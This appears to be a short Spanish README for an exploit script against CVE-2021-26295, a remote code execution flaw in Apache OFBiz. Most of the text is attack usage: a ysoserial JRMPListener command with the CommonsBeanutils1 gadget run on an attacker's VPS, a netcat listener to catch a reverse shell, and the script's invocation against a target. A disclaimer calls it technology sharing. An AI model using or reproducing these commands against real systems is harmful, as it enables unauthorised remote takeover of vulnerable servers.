
Exploit para CVE-2021-26295 (RCE en Apache OFBiz) que utiliza el listener JRMP de ysoserial para ejecutar comandos y obtener una shell inversa en objetivos vulnerables.
CVE-2021-26295 EXP puede obtener una reverse shell exitosamente
Este artículo y la herramienta son solo para compartir tecnología. Está estrictamente prohibido su uso con fines ilegales. Cualquier consecuencia derivada será responsabilidad del usuario.
RMI en el VPS en el puerto 9999java -cp ysoserial.jar ysoserial.exploit.JRMPListener 9999 CommonsBeanutils1 '[comando a ejecutar]'
nc64444nc -lvp 64444
python3 cve-2021-26295_exp.py <target> <vps_ip> <vps_port>

